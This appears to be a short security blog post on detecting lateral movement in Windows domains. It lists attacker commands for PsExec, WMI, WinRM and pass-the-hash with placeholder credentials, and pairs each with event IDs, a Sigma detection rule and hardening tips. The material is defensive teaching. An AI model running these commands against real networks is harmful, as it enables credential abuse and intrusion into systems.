The Phase Between Foothold and Objectives
Lateral movement is where most attackers spend the majority of their dwell time. It's also where defenders have the best detection opportunities — because legitimate admin activity looks different from attacker lateral movement at the protocol level.
Common Techniques
PsExec / SMB Exec:
psexec.py corp.local/admin:'pass'@10.10.10.20
# Detection: Event ID 7045 (service install), 5145 (ADMIN$ access)
WMI:
wmiexec.py corp.local/admin:'pass'@10.10.10.20
# Detection: Event ID 4688 (WmiPrvSE.exe spawning cmd.exe)
WinRM:
evil-winrm -i 10.10.10.20 -u admin -p 'pass'
# Detection: Event ID 4624 type 3, wsmprovhost.exe as parent
Pass-the-Hash:
crackmapexec smb 10.10.10.0/24 -u admin -H <ntlm_hash>
# Detection: 4624 type 3 with NTLMv2, no Kerberos pre-auth
Detection Rule (Sigma)
title: Lateral Movement via PsExec
logsource:
product: windows
service: system
detection:
selection:
EventID: 7045
ServiceName|contains: 'PSEXESVC'
condition: selection
Defensive Takeaways
- Block workstation-to-workstation SMB at the firewall level
- Enable detailed process creation logging (Event 4688 with command line)
- Alert on any use of
ADMIN$from non-jump-host sources - Tiered admin model: different credentials for workstations, servers, and DCs
Keep going
Get the next writeup in your inbox
New posts delivered when I publish. No spam.